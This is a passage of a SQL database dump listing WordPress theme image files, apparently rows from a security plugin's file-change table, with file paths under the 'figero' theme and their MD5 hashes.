(0x734fae1e53b55a7c9b7cedac346e4528, 'wp-content/themes/figero/images/close.png', 1, 0x00000000000000000000000000000000, 0xf2aace763cfcc4d6f3427a8a0842e55c),
(0x6c8087b80fa151f8bb18fa7c4893d789, 'wp-content/themes/figero/images/comma.png', 1, 0x00000000000000000000000000000000, 0x93235ee0a743b776dd4d304e7c10adc5),
(0x109f7a88dab309bd9065a55f55a2319b, 'wp-content/themes/figero/images/comments3.png', 1, 0x00000000000000000000000000000000, 0x6a3473d6a9daa2e359e84304c517bfb2),
(0x61d0c3aa8fb1929799abbce334b3061c, 'wp-content/themes/figero/images/content-border.png', 1, 0x00000000000000000000000000000000, 0x6a87ee9af49f7d957a61e13d61e505f1),
(0xb5a0b4ac154dd6a967e45e55ece1ca8f, 'wp-content/themes/figero/images/css3buttons_backgrounds.png', 1, 0x00000000000000000000000000000000, 0x6612d20975c20cb5fab2015dc4614379),
(0xb62555410bee5e1e84f12d4d1e934bf6, 'wp-content/themes/figero/images/css3buttons_icons.png', 1, 0x00000000000000000000000000000000, 0x0107f689fb00a6665444e631669048c3),
(0xe380fbe66744f371ba313cc3c4d9147e, 'wp-content/themes/figero/images/end-strip.png', 1, 0x00000000000000000000000000000000, 0x357f91d97f575c331911ade98b2d2384),
(0x00e1d21d982714de8565d87b13ce183b, 'wp-content/themes/figero/images/f.png', 1, 0x00000000000000000000000000000000, 0x5bfc0e939a69705d67c62b34637a333e),
(0xa2749ad49241065dc9985ed659342c63, 'wp-content/themes/figero/images/facebook.png', 1, 0x00000000000000000000000000000000, 0x19f875e547b8bdedde480fb73ee8c573),
(0x7a3001945e17131703785a6e644ede85, 'wp-content/themes/figero/images/findusfacebook.png', 0, 0xbc36592dd3fea773f282facdb671b043, 0xbc36592dd3fea773f282facdb671b043),
(0x8eb8bb13fd249b42e16b4ad30586a817, 'wp-content/themes/figero/images/footer-background-blue.png', 1, 0x00000000000000000000000000000000, 0x64759d3151a6bb64234545a75464b058),
(0x07ad7a9a6492d5894d58625ce9c3844f, 'wp-content/themes/figero/images/footer-background-skyblue.png', 1, 0x00000000000000000000000000000000, 0xacf649cf994dfbbc00a64586b8477348),
(0x975c5f75d5fda2007c5592202097bae7, 'wp-content/themes/figero/images/footer-background.png', 1, 0x00000000000000000000000000000000, 0x008d7454a017cc33f5b734f68ff1b3ca),
(0x5d0a7cbf0c5d4bf8b418c6903ac228c3, 'wp-content/themes/figero/images/footer-line.png', 1, 0x00000000000000000000000000000000, 0x02d0a73bd8c99946c29640552323dfa5),
(0x5906fdd5c7e8a504fed5d0edd90bf1fa, 'wp-content/themes/figero/images/footer-line1.png', 1, 0x00000000000000000000000000000000, 0xa455a8cfc5fb461c285879536dae9b2e),
(0x71cad013a83bea20ba66bee855e9a50c, 'wp-content/themes/figero/images/footer-line2-blue.png', 1, 0x00000000000000000000000000000000, 0xdd42e8d13fbc97ddff6e2b49f405d80a),
(0xe1f98d44ba7f8494abd66e88d44d4473, 'wp-content/themes/figero/images/footer-line2-brown.png', 1, 0x00000000000000000000000000000000, 0xef2a16e316e0234c05bfeaebd343d07e),
(0x24e9b23c8d8feaeb8704bdc4bda5cdd1, 'wp-content/themes/figero/images/footer-line2-green.png', 1, 0x00000000000000000000000000000000, 0xcfa7bb089cf887c3ec2f347a5464f3a4),
(0xaaab325a681b3ea846b989144cf76aab, 'wp-content/themes/figero/images/footer-line2-orange.gif', 1, 0x00000000000000000000000000000000, 0x70d5b4438c1369b0a463c73e08706fd6),
(0xe79d3b4e666dfa34db1c2b90dc13a0b8, 'wp-content/themes/figero/images/footer-line2-orange.png', 1, 0x00000000000000000000000000000000, 0x7326205e86528f115185a58846da0a62),
(0x1e2d9ab4a70934728a81110a3fc7f9ec, 'wp-content/themes/figero/images/footer-line2-pink.png', 1, 0x00000000000000000000000000000000, 0x24e42a105f3ef2a5a6a44364680d0809),
(0xc363ca9adaec6a3d20605a8dea0136e1, 'wp-content/themes/figero/images/footer-line2-red.png', 1, 0x00000000000000000000000000000000, 0x87c434d568e496f333af36dac73d2154),
(0x2dccf4a6edb915a42f63f8f0ac43e228, 'wp-content/themes/figero/images/footer-line2-skyblue.png', 1, 0x00000000000000000000000000000000, 0xaf03b210b0c6407a7b1c577f19ccfa00),
(0xcb0c24e36ffeecdb58243771be5e2e4f, 'wp-content/themes/figero/images/footer-line2.png', 1, 0x00000000000000000000000000000000, 0xe49517809979489064896f6512f75bad),
(0x4d9cfea50877e332f48ebf7044af4c64, 'wp-content/themes/figero/images/footer-nackground-orange.gif', 1, 0x00000000000000000000000000000000, 0x17c62b4b5ea306db208d9f937ab3cc90),
(0x878783208c7b8378f164af4934860cc5, 'wp-content/themes/figero/images/g-two.png', 1, 0x00000000000000000000000000000000, 0x287e3603271d54f41fa9a7d6e229097d),
(0xae0ca3926f9ef277da6157d03ea22c21, 'wp-content/themes/figero/images/get-it.png', 1, 0x00000000000000000000000000000000, 0xddc522fe33c66635eb315f59cf779223),
(0x24936a95133ceecb7cc4c0289b3c8e35, 'wp-content/themes/figero/images/header-bottom.png', 1, 0x00000000000000000000000000000000, 0x13d0b37145d34b4d1416927d1e05b815),
(0x7a214d86dfadcdfd58b43571fdfd6860, 'wp-content/themes/figero/images/header-bottom1.png', 1, 0x00000000000000000000000000000000, 0x301c3e9a6deab7295cb811fc97159d00),
(0xb2c301e978ac6744c7c7b28780027463, 'wp-content/themes/figero/images/header-strip-blue.png', 1, 0x00000000000000000000000000000000, 0x1814ec7bee839d915e44cbb10fd16f56),
(0xa9227104a9994ce205b16b0cb1d3f4d2, 'wp-content/themes/figero/images/header-strip-brown.png', 1, 0x00000000000000000000000000000000, 0xeeb0cd2c69b37181b8493df674df885e),
(0x46e3c3779092677bae932ae518ac8f52, 'wp-content/themes/figero/images/header-strip-green.png', 1, 0x00000000000000000000000000000000, 0xfb4a51ceaf3380091ef096e0073d902d),
(0x1b20e9f11f89ec103ebeac2328ff57e3, 'wp-content/themes/figero/images/header-strip-orange.gif', 1, 0x00000000000000000000000000000000, 0x362c8cf51a522ef32eeb46a2f7438d66),
(0x3640b6356628b037def90824e614c982, 'wp-content/themes/figero/images/header-strip-orange.png', 1, 0x00000000000000000000000000000000, 0x95db2461a9ad58c955d0dfb76084e26e),
(0x24ed5ccd4b352ee4ed86d224858bfa64, 'wp-content/themes/figero/images/header-strip-pink.png', 1, 0x00000000000000000000000000000000, 0xff2596a54ecdee319013d594445dc625),
(0xede7ef3367c01fe218ee889a0ff93b41, 'wp-content/themes/figero/images/header-strip-red.png', 1, 0x00000000000000000000000000000000, 0x09954cde9d4e51e617be1ace42f39db4),
(0x6d943b27a2583df18c4154cd127be48e, 'wp-content/themes/figero/images/header-strip-skyblue.png', 1, 0x00000000000000000000000000000000, 0x6c63814bcf6271d3cfd6129eeaa2db4b),
(0x412b30e365acb67f4672d4ba230fe59f, 'wp-content/themes/figero/images/header-strip.png', 1, 0x00000000000000000000000000000000, 0xfd5502407ee9794f42ac310ae342b137),
(0x3fe213fedf63bb0a6f9e5749b3fe084b, 'wp-content/themes/figero/images/header-strip1.png', 1, 0x00000000000000000000000000000000, 0x155fb071989508a8ce92cbb24c4cc75c),
(0x853ecc5817e9b94339e6e3bac727ff56, 'wp-content/themes/figero/images/image1.png', 1, 0x00000000000000000000000000000000, 0xa179087c8f31ed4d164db4cbc64d74ce),
(0xe83410f27e6479357de12247c618b444, 'wp-content/themes/figero/images/in.png', 1, 0x00000000000000000000000000000000, 0xc950c39655985c9a2e80d1b78301cc96),
(0x19f469075deb23339c2fbbe11be0900b, 'wp-content/themes/figero/images/left-arrow.png', 1, 0x00000000000000000000000000000000, 0x9c78b6b8fd5b9fc7ea1637250eea1351),
(0x4de80784c4c56ca4782fb9d1220a871b, 'wp-content/themes/figero/images/lightclose.gif', 1, 0x00000000000000000000000000000000, 0x2c38ae5be85141bf8867c9523f4bc357),
(0x279e20cd4c30a6abe00780f47fb9d57f, 'wp-content/themes/figero/images/lightnext.gif', 1, 0x00000000000000000000000000000000, 0x23414965ebe526012e473c1d4d65d4e7),
(0x6533ac544f6c87c813149b0ede9c8204, 'wp-content/themes/figero/images/lightprev.gif', 1, 0x00000000000000000000000000000000, 0x5a9118de4ef6226473190d6e82f6d80d),
(0x0297d659a7041b84dcd80826cb5eb941, 'wp-content/themes/figero/images/line.png', 1, 0x00000000000000000000000000000000, 0xde73bd3b1487c05313734f073420bf31),
(0x52ab392910195cb3ea40fa150f66abb0, 'wp-content/themes/figero/images/link-1-red.png', 1, 0x00000000000000000000000000000000, 0xc6ffecfce167cbc8b53a20bf88dd5db4),
(0xc8be9797db5cba30539636fcc5be5b96, 'wp-content/themes/figero/images/link-1.png', 1, 0x00000000000000000000000000000000, 0x743b08fe6d0d2d44e86574da1d9454ee),
(0x7c20fc8d31416246d25af0bf5ff928eb, 'wp-content/themes/figero/images/link-2-red.png', 1, 0x00000000000000000000000000000000, 0x9b57f719c968b6b093313ccb18b46fa1),
(0x5ff0510c35e6e53b1c6866e7a0b5abc9, 'wp-content/themes/figero/images/link-2.png', 1, 0x00000000000000000000000000000000, 0x1fb9db8b3277ffd851b2c7534ef492b2),
(0x5b3b738a155e767f150e2d27b6d95c01, 'wp-content/themes/figero/images/link-3-red.png', 1, 0x00000000000000000000000000000000, 0x36470306c8472b56dc42e1ce7654ffb5),
(0x782b1ce5929dfb2897a4ad95df442e7f, 'wp-content/themes/figero/images/link-3.png', 1, 0x00000000000000000000000000000000, 0xf230545e22328af2c3ad64f65f5dee06),
(0x16c3bcfe312fa0bc140c9880ddf4316a, 'wp-content/themes/figero/images/link-4-red.png', 1, 0x00000000000000000000000000000000, 0x31356a5f0add2cd09cda1d2f8fb2ad8b),
(0x5b5b37ec8de81101c9a4cf1cfa3852fd, 'wp-content/themes/figero/images/link-4.png', 1, 0x00000000000000000000000000000000, 0x2d285d4f0ce501151fcfc283cc928512),
(0x3f407a3f4c3a0098e21cd39a06d86282, 'wp-content/themes/figero/images/link-5-red.png', 1, 0x00000000000000000000000000000000, 0x9b403dd15ef5c71a809bda3d78baee39),
(0xa03044f578f33f536b2ad58088f06cb9, 'wp-content/themes/figero/images/link-5.png', 1, 0x00000000000000000000000000000000, 0x299f3caece3d5bc71f7b74f6e1be97cc),
(0xd43a362e4c74db45aab25d9542d0429b, 'wp-content/themes/figero/images/link-6.png', 1, 0x00000000000000000000000000000000, 0x66a4d6ebd734b81535bf1060fdcba3c1),
(0x43749aacdb43350e2893c698ddff230f, 'wp-content/themes/figero/images/list-strip.png', 1, 0x00000000000000000000000000000000, 0x095650ce8cb29c1a7f303c7ce8040722),
(0x8379ba6a5afd96ebf4289df94fd6ecb0, 'wp-content/themes/figero/images/loader.png', 1, 0x00000000000000000000000000000000, 0x66cdf8d9cd5089c45c74e75f9d81a3bc),
(0x9446323dc976f581e9960d9ee3185f0f, 'wp-content/themes/figero/images/logo.png', 1, 0x00000000000000000000000000000000, 0x40a8d6699902ef2cd1470c580e0e57bb),
(0x98888b074cabe468e3a939d498b43f2d, 'wp-content/themes/figero/images/logo123.png', 1, 0x00000000000000000000000000000000, 0x868767a2681cffed0eebaccc10311a0a),
(0xc8cf4222e991fdb165f5288b58b767c5, 'wp-content/themes/figero/images/menu-border.png', 1, 0x00000000000000000000000000000000, 0x105305524eb2c4f55aaffb808f27ac95),
(0x78558371ba3b6d20ac7f30ea604c6b69, 'wp-content/themes/figero/images/name-field.png', 1, 0x00000000000000000000000000000000, 0xd9f17276782ede71bc90b85ff0723280),
(0xf90f7a41af93c2d84cdaa12b56447cd9, 'wp-content/themes/figero/images/neeraj.jpg', 1, 0x00000000000000000000000000000000, 0xa9d8be9a3ed82a321df000a82b921cd8),
(0x30a3d5debd01e487932f669938b96abe, 'wp-content/themes/figero/images/next-black.png', 1, 0x00000000000000000000000000000000, 0xf6e72d6370b00b4d9a087be64ed3a282),
(0xd7e426ec5481c0dc2b0e68435eb2877e, 'wp-content/themes/figero/images/next-blue.png', 1, 0x00000000000000000000000000000000, 0x5b7ef9108a75f7fe12e20b0411b0d8fe),
(0x1b664b20cbeaa53687b4b33b1a845d03, 'wp-content/themes/figero/images/next-skyblue.png', 1, 0x00000000000000000000000000000000, 0xd5653aada2c8f7585eeec47ae28d1f6e),
(0x52fc1ef3a58b67b1a99a2c127064d76c, 'wp-content/themes/figero/images/next.png', 1, 0x00000000000000000000000000000000, 0x92f82c22b2d40336a9a0595a90751ccb),
(0x640283bde87531beddb0552d5b98af3c, 'wp-content/themes/figero/images/page-info-strip.png', 1, 0x00000000000000000000000000000000, 0x606e8b7d7dbd9b2197bbc72281802abd),
(0x0b3827f001af87a8129ae5e1d67cf440, 'wp-content/themes/figero/images/pagination.png', 1, 0x00000000000000000000000000000000, 0x999ddddbf12a93103b33f068da47a578),
(0xcadddabb69c53d54bad5de4db7fc51a3, 'wp-content/themes/figero/images/pattern.jpg', 1, 0x00000000000000000000000000000000, 0x9a3e6b4be6e311d3dfeca78711dcad93),
(0x527fdda4e16521337626d6232e66c47c, 'wp-content/themes/figero/images/port-stripbg.png', 1, 0x00000000000000000000000000000000, 0x1e70d0e71395279f088e2147639d9299),
(0x9b5cce1c8c2348e3b6d55e504075b100, 'wp-content/themes/figero/images/portbg.png', 1, 0x00000000000000000000000000000000, 0x21f0e56c169dac3c4bf80cd73f3ae36d),
(0x71552a62037297e9a52ce9d06f7579bc, 'wp-content/themes/figero/images/ppnext.png', 1, 0x00000000000000000000000000000000, 0xb8d4bf8440aae57321064ecaf2efea7e),
(0x16a4cee85f969b221a2ba5a56dd20fa5, 'wp-content/themes/figero/images/ppprev.png', 1, 0x00000000000000000000000000000000, 0xb251170307bcb724ac5b4e97482dc6ed),
(0x1c611d249a3e0c6af61210ceb42ad431, 'wp-content/themes/figero/images/ppsprite.png', 1, 0x00000000000000000000000000000000, 0xa157ef765ce8288984373a7eba6b9a23),
(0xa12671ea0ed4bcfb72a0ce4b4bb897e2, 'wp-content/themes/figero/images/prev-black.png', 1, 0x00000000000000000000000000000000, 0xa47fae41515d56e85faa12d6fea632d9),
(0xba6b8f8d219a8bf32569f77f6d709faa, 'wp-content/themes/figero/images/prev-blue.png', 1, 0x00000000000000000000000000000000, 0xdc8373e5c45d2c680a60a5c9b258e3ed),
(0x692c5d7e0aa5225ce80f7c2a30cf33e5, 'wp-content/themes/figero/images/prev-skyblue.png', 1, 0x00000000000000000000000000000000, 0x4f834a33421b40178ac160cb21533fd6),
(0x3523e27e72c59aff001c54fc65976d27, 'wp-content/themes/figero/images/prev.png', 1, 0x00000000000000000000000000000000, 0xc6ac205eedb4903e911e2b82cd6a1090),
(0x7aa0ddd4e3e8c69e8de99b65b6c433a0, 'wp-content/themes/figero/images/right-arrow.png', 1, 0x00000000000000000000000000000000, 0x79ff1d1c2f39b20d0729d5b225fbdc22),
(0x2631a05342e77e5c6648150b8dc716cd, 'wp-content/themes/figero/images/rss.png', 1, 0x00000000000000000000000000000000, 0x03f384957b0c71b0c5aaa5be7f20586f),
(0x51bbe96edbef4ad9a785f77d69f56366, 'wp-content/themes/figero/images/sca.png', 1, 0x00000000000000000000000000000000, 0x751cf8b599787288bcb4a935047057e3),
(0x28ab91a9f6938ba491964a485f21c9d2, 'wp-content/themes/figero/images/scale.png', 1, 0x00000000000000000000000000000000, 0xbe376b0192d28fd60a99e99834d1fa0b),
(0xa0471fbbacf5c1d527ec4d496bc216fc, 'wp-content/themes/figero/images/scale1.png', 1, 0x00000000000000000000000000000000, 0x00ca6ed876230198c3995f028120fc63),
(0xd87e38de44c7bbdaf8ed168ec375c106, 'wp-content/themes/figero/images/scale10.png', 1, 0x00000000000000000000000000000000, 0x97d5e541b502031a0192600901459d95),
(0x5ed7cebd0a6fbad320bc772b7553108a, 'wp-content/themes/figero/images/scale11.png', 1, 0x00000000000000000000000000000000, 0x01860bf0fa0ac514a49035c15ac1cfe0),
(0xcfd546d633a55c3d4231d3b64d2a0cee, 'wp-content/themes/figero/images/scale2.png', 1, 0x00000000000000000000000000000000, 0x066d9bdb080ca0c68deb498bd91fc41e),
(0x90261ef21651ec67b8d417ddf735a112, 'wp-content/themes/figero/images/scale3.png', 1, 0x00000000000000000000000000000000, 0x7825341ab80543e4859a8abe6ec208ba),
(0x6348936d74c33eb2b4af282fe7be1ccf, 'wp-content/themes/figero/images/scale4.png', 1, 0x00000000000000000000000000000000, 0xb2d37b65aa7bae6a4d442e75f1ee7862),
(0x9e7f684d630c254a01b1b42cdd988a1d, 'wp-content/themes/figero/images/scale5.png', 1, 0x00000000000000000000000000000000, 0x24c4904d926f6737ec1e066a92b530ca),
(0x230b367d6d9796d4ade400117e9e1542, 'wp-content/themes/figero/images/scale6.png', 1, 0x00000000000000000000000000000000, 0x294ee38458e0654a86abc5c187ffeba2),
(0x1597535c8877ab2de8c17642690e9bd5, 'wp-content/themes/figero/images/scale7.png', 1, 0x00000000000000000000000000000000, 0x2f1c485a858dd5aa51d9e47d713e6a38),
(0x67e9a0b7c8c7dfb64607aec5e4a7dfb6, 'wp-content/themes/figero/images/scale8.png', 1, 0x00000000000000000000000000000000, 0x03a9b227bef491b88694d9f6a083db1a),
(0xe236743590fed1ab440f258b20ab7481, 'wp-content/themes/figero/images/scale9.png', 1, 0x00000000000000000000000000000000, 0xabdfa871e129a4603295f454fe650c41),
(0x7f230f5e718529adf9227571a6fb56a9, 'wp-content/themes/figero/images/seach.png', 1, 0x00000000000000000000000000000000, 0x12a6dc81d1f6193e447605766443dd43),
(0x11d9a7962b21027b8525f6f5e1f41369, 'wp-content/themes/figero/images/search-bg.png', 1, 0x00000000000000000000000000000000, 0xe1f9064806e2aba354684bebdadb1a87),
(0xccac0b475980865891c98cdf155fe830, 'wp-content/themes/figero/images/search.png', 1, 0x00000000000000000000000000000000, 0x12a6dc81d1f6193e447605766443dd43),
(0xe2bdf17c1caf5ccacc3fa9d370a4b77a, 'wp-content/themes/figero/images/searchbg-blue.png', 1, 0x00000000000000000000000000000000, 0xbdc47c3d60754130f587d0a7126073c4),
(0x3521c150fc28af5c93d1aa7adf4b8c2e, 'wp-content/themes/figero/images/searchbg-skyblue.png', 1, 0x00000000000000000000000000000000, 0xa923a474393ae1b200b9c67b2261829b),
(0xcfcec9c7debf25c3718e5559850923c1, 'wp-content/themes/figero/images/searchbg.png', 1, 0x00000000000000000000000000000000, 0x998698c3d6fa24a93e7f01c2f2dcedc7),
(0xefe28a4ab9fb425cfe93233361070435, 'wp-content/themes/figero/images/second-header.png', 1, 0x00000000000000000000000000000000, 0x817ae7d1710cfbba56f53fdb5dd56c3f),
(0x501ad2ca217b2bc953f3340910a2d91f, 'wp-content/themes/figero/images/seprater.png', 1, 0x00000000000000000000000000000000, 0xa40d35b7a79403918620a7f802ed3b43),
(0x42dc7fc1a16ff78094f88a59ecc006ec, 'wp-content/themes/figero/images/shadow-gall.png', 1, 0x00000000000000000000000000000000, 0xb488a9fa11694689aac33212913303c4),
(0x69d780ba6a0d6ea4d4cd76c3d45c383b, 'wp-content/themes/figero/images/shadow.png', 1, 0x00000000000000000000000000000000, 0xe7ca1a12c746c49923cdf9b3965d886f),
(0x3cf5b40d5159d5c9e7f5da6d5a535766, 'wp-content/themes/figero/images/shadow1.png', 1, 0x00000000000000000000000000000000, 0xa3f279ae299f610854f6cfe641e56a59),
(0x87180f41913a5a588390de56bca9931b, 'wp-content/themes/figero/images/simpleclose.png', 1, 0x00000000000000000000000000000000, 0x7a506161878e748291da5aae0e525fa8),
(0xbb1036313ba9104e2021d9df3a8f8cf9, 'wp-content/themes/figero/images/simplenav.png', 1, 0x00000000000000000000000000000000, 0x38f3be44b3d26c9b6ac2d394ed6033e9),
(0xdfb64e4c3cfbb497097bc42cbf724312, 'wp-content/themes/figero/images/slider-heading-line.png', 1, 0x00000000000000000000000000000000, 0x5b13fd67e74b7d3265558af884a6fd3e),
(0xcd0d6cd85e0b7c48054a7cde6a27d014, 'wp-content/themes/figero/images/slider-strip-black.png', 1, 0x00000000000000000000000000000000, 0xfbf52dd4f44730906a7a0a8809c8fbc2),
(0xc893a1a12495550b61c29fd9f27ea161, 'wp-content/themes/figero/images/slider-strip-blue.png', 1, 0x00000000000000000000000000000000, 0xac657eab3f0eff3b5c0807fb164a1642),
(0x17e64b5bb58a0b1f9e256553d23aaa53, 'wp-content/themes/figero/images/slider-strip-brown.png', 1, 0x00000000000000000000000000000000, 0xf4d8312c91244010893dfe0cbd8e8808),
(0x3909cd8129e541ebae8fb8f7313e38cc, 'wp-content/themes/figero/images/slider-strip-green.png', 1, 0x00000000000000000000000000000000, 0x89e120a1e0c9f10175abd3cfb66fafea),
(0x9993b960ede576efd80d1a3be1958596, 'wp-content/themes/figero/images/slider-strip-orange.png', 1, 0x00000000000000000000000000000000, 0xe6fc80f99d827b88f5651fc11371a5ff),
(0x75416cf4c44854a14a21621746671929, 'wp-content/themes/figero/images/slider-strip-pink.png', 1, 0x00000000000000000000000000000000, 0xe4a98f558132644071e0e63bdc9ae2ea),
(0xa4f6a57f94aaf7788ca5c566999fb911, 'wp-content/themes/figero/images/slider-strip-red.png', 1, 0x00000000000000000000000000000000, 0x4a44be6b83683e8acf625769a07ef808),
(0x85d6d408a769e5d218d38d1b83fc91f5, 'wp-content/themes/figero/images/slider-strip-skyblue.png', 1, 0x00000000000000000000000000000000, 0x1b9fa4289ec3a24923c801a7f2f38ec8),
(0x4384c734adc3e5da4f3cd44d30f1357f, 'wp-content/themes/figero/images/slider-strip-yellow.png', 1, 0x00000000000000000000000000000000, 0xbd62d21a6af7dbfe77c71cf10b02711e),
(0xa3113fa46e82f83fe39fe50b81e28ec8, 'wp-content/themes/figero/images/slider-strip.png', 1, 0x00000000000000000000000000000000, 0x35e5b473446d72cdb356f83310b26ab9),
(0x4736f8197ac3621c755ef6b50a27333d, 'wp-content/themes/figero/images/sliderbg-black.png', 1, 0x00000000000000000000000000000000, 0x09a927b77e42df4445c64bc01b2030db),
(0xd68c2386f64f787937bc3dd8ba201d9f, 'wp-content/themes/figero/images/sliderbg-blue.png', 1, 0x00000000000000000000000000000000, 0x4d85bb1f021f5510ca6c0f605fdf72ff),
(0x2a0a0e01582177a9b033f24dd740ee26, 'wp-content/themes/figero/images/sliderbg-brown.png', 1, 0x00000000000000000000000000000000, 0x4f641d72b94a5125ac7bbc444a66514a),
(0xacfa2b32a350829af7376fa13c15461f, 'wp-content/themes/figero/images/sliderbg-green.png', 1, 0x00000000000000000000000000000000, 0x1b31525af2855b0585fe60abe0ff220d),
(0x736265f092e0f196e7801bad97b5079a, 'wp-content/themes/figero/images/sliderbg-orange.gif', 1, 0x00000000000000000000000000000000, 0xbd5a50ad8312083acba8967bf3af829e),
(0x06ff247cbaf01b2f6e013c740eec7b92, 'wp-content/themes/figero/images/sliderbg-orange.png', 1, 0x00000000000000000000000000000000, 0xcb9c9c0ecd9dfcc79865e73c5c891935),
(0x46d7580612e6455ff580fb3b8cabfc96, 'wp-content/themes/figero/images/sliderbg-pink.png', 1, 0x00000000000000000000000000000000, 0x02133452eee2528e6ce62937518b07ee),
(0xa0f50b1ead67b3b96bc8b3d146bfef95, 'wp-content/themes/figero/images/sliderbg-red.png', 1, 0x00000000000000000000000000000000, 0xa180ee129a77332dcc9a7946bc7f8264),
(0xa3c88e6f99c09906e4ebae6705eb0bde, 'wp-content/themes/figero/images/sliderbg-skyblue.png', 1, 0x00000000000000000000000000000000, 0x9e50e56de1d0ed57e36c6395c8687039),
(0xf7954f63104032f492253729edd159fd, 'wp-content/themes/figero/images/sliderbg-yellow.png', 1, 0x00000000000000000000000000000000, 0xf5b67bae188cbae0e92f53f9ebf24d70),
(0x8bfad78c62e7ec82a8133f08911b0749, 'wp-content/themes/figero/images/sliderbg.png', 1, 0x00000000000000000000000000000000, 0x231cd3ad5976379fade8eb9658e868b5),
(0x44e7a5b76ea02598d6a400d21025c069, 'wp-content/themes/figero/images/sliderbg1.png', 1, 0x00000000000000000000000000000000, 0x29f517734f027b27ff3e7f60feec9970),
(0x2cbb67e6f1f884e15c0fe1e323fe90ec, 'wp-content/themes/figero/images/sliderbg2.png', 1, 0x00000000000000000000000000000000, 0x96795ff7db16d9d15d55378d2e0dd5e5),
(0xb1d057f568ebeaac995f52a580227832, 'wp-content/themes/figero/images/sliderbg3.png', 1, 0x00000000000000000000000000000000, 0xc268666013d8f91767f773fee94c8d07),
(0x0e1dfb5b0de54114fc5657f6a92f806a, 'wp-content/themes/figero/images/sliderbg4.png', 1, 0x00000000000000000000000000000000, 0x61627ba025894c2c7c58e080413676e2),
(0x9433d0b501b8c11c941abc9d3c67db1e, 'wp-content/themes/figero/images/sliderbg5.png', 1, 0x00000000000000000000000000000000, 0x449f74a5f8c911098ad777065db091a5),
(0x14b3aebb2ef062ee0ccdab803086e251, 'wp-content/themes/figero/images/sliderbg6.png', 1, 0x00000000000000000000000000000000, 0xb87cefb9bd2ad0842f295710dc3ebf36),
(0x6c5102a2a13f5fc1304844fd4e335428, 'wp-content/themes/figero/images/strip-line-blcak.png', 1, 0x00000000000000000000000000000000, 0xca0ba830c58177becb19a99722fd770e),
(0x6a097094280e8c812f9949e22d5ed4d3, 'wp-content/themes/figero/images/strip-line-green.png', 1, 0x00000000000000000000000000000000, 0x9523b9e18d0a58953d179d44d029266d),
(0x6161458f93491e15fdd829dce4a9ae17, 'wp-content/themes/figero/images/strip-line-orange.png', 1, 0x00000000000000000000000000000000, 0x28ae2b5b4a4e4239027ba2e7533fee67),
(0x41399d126f826c33200fa4ae12ad0f25, 'wp-content/themes/figero/images/strip-line-pink.png', 1, 0x00000000000000000000000000000000, 0x2a19a341f49b9671a2819a63f56ee167),
(0x48f2ad14aef82235c6428db6df393269, 'wp-content/themes/figero/images/strip-line-red.png', 1, 0x00000000000000000000000000000000, 0x39100c46dfbed13d5279f79b6b9e5a4a),
(0xe7fb28bb46a4fb975d0e2c63bb854fb9, 'wp-content/themes/figero/images/strip-line-yellow.png', 1, 0x00000000000000000000000000000000, 0x8b1c294884473128d28a6eed6ec484e6),
(0x96b7a740a76bb31a5cc2c99c456b1119, 'wp-content/themes/figero/images/strip-line.png', 1, 0x00000000000000000000000000000000, 0xbef6305bdf28d6dd22ffb5f94b7f9d26),
(0x937ebf447bd8843c697218b4fb49f7f7, 'wp-content/themes/figero/images/strip.png', 1, 0x00000000000000000000000000000000, 0x56c6bbbab65ab9ed2da981515b4cbc7c),
(0xa7f75bc61c10b7f1f63dbccae79fd8c6, 'wp-content/themes/figero/images/sub.png', 1, 0x00000000000000000000000000000000, 0xa6dcdabbfe09c208348927dde587194f),
(0x90163469ea0f7dca583ee7b72bd16ac0, 'wp-content/themes/figero/images/subheadstrip-black.png', 1, 0x00000000000000000000000000000000, 0xe512fe3939b2cb2c185dae58f4cc3918),
(0x313c2b1839a6619e6042c0b3e3228cac, 'wp-content/themes/figero/images/subheadstrip-green.png', 1, 0x00000000000000000000000000000000, 0xf22b9a44c6fd8b6b409153493195a85a),
(0x8b38418cfdeb69457d411bc6e7dc1266, 'wp-content/themes/figero/images/subheadstrip-orangepng.png', 1, 0x00000000000000000000000000000000, 0x63ca3134c3f8375c3037f034273f3de3),
(0xd8784dfa3bdad3f8d7ad950ca8c1b298, 'wp-content/themes/figero/images/subheadstrip-pink.png', 1, 0x00000000000000000000000000000000, 0x0edf32c2adfa38917dd307b045a11159),
(0x795b3722f94bab8050b9fb60b78b10af, 'wp-content/themes/figero/images/subheadstrip-red.png', 1, 0x00000000000000000000000000000000, 0xaabb1c12da9330decc2bd98f261e44f3),
(0x2d97d4e98614f32171e8d6c8baba0c02, 'wp-content/themes/figero/images/subheadstrip-yellow.png', 1, 0x00000000000000000000000000000000, 0x146577dec154189306971d32e4dd068a);
INSERT INTO `www2_wfFileMods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`) VALUES
(0x714ab52b8f286832e5a666dbadf3afbb, 'wp-content/themes/figero/images/subheadstrip.png', 1, 0x00000000000000000000000000000000, 0x35ef1fe282590e8e5fa9e6c241286c7c),
(0xb93549e514b5bd8256f497f24fe698e7, 'wp-content/themes/figero/images/submit.png', 1, 0x00000000000000000000000000000000, 0xbc96f62fc3cc8c4f9cd38ec377f73c6f),
(0x25d41fe8b3269a22d65540d94de24602, 'wp-content/themes/figero/images/t.png', 1, 0x00000000000000000000000000000000, 0x61c2a44e3627e32f29088a7cae4310d9),
(0x6a794fc71f9827acefc5a3f183eb877e, 'wp-content/themes/figero/images/text-area-top.png', 1, 0x00000000000000000000000000000000, 0xdd1641f6f503ad4e1426ca8efd63f4a0),
(0xfa898cfadc4bd69cb9d73f8619732046, 'wp-content/themes/figero/images/text-area.png', 1, 0x00000000000000000000000000000000, 0x2e9f84d7763645aaefef7fc03fbd6134),
(0x7f5418d57cf75874e214aac09d207d8d, 'wp-content/themes/figero/images/text-field.png', 1, 0x00000000000000000000000000000000, 0xefb46a4b0bbe76ec384f147915028a3b),
(0x5797a277a3dec77e3c9424b24857cbca, 'wp-content/themes/figero/images/tipsy.gif', 1, 0x00000000000000000000000000000000, 0x84c683bb61e04eed786306a59ae8cbf5),
(0x81b8ebabba2178211d7756b5fb1bdd4a, 'wp-content/themes/figero/images/tipsy.png', 1, 0x00000000000000000000000000000000, 0xbec682d2c58246485f1d6ac318dfa922),
(0x91704b830c4ca8f6d80f898c88742719, 'wp-content/themes/figero/images/top-strip-black.png', 1, 0x00000000000000000000000000000000, 0xc191e4d4e1f0953174fcb66562edafb8),
(0x81d89a84e968e23faefd5cb62877d37b, 'wp-content/themes/figero/images/top-strip-green.png', 1, 0x00000000000000000000000000000000, 0xe94f317010aa00b6c82ab9ce79233eb1),
